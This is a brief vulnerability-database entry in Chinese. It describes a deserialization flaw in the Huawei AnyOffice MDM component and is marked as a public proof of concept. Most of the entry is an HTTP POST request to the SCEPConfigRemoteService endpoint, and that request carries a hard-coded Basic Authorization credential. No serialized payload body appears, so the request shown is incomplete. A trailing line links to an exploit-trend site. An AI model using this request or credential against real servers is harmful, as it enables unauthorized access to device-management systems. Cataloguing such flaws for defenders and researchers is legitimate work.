华为AnyOffice MDM组件反序列化漏洞

2021-10-09 AnyOffice PoC Public

Description

AnyOffice MDM组件存在反序列化漏洞

PoC

POST /MDMServer/mdmServerRemote/SCEPConfigRemoteService HTTP/1.1
Host: 
Authorization: Basic VFNNOk95emhyS085NWoyTzlNUDhaTjJPS0E9PQ==
Content-Type: application/x-www-form-urlencoded

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.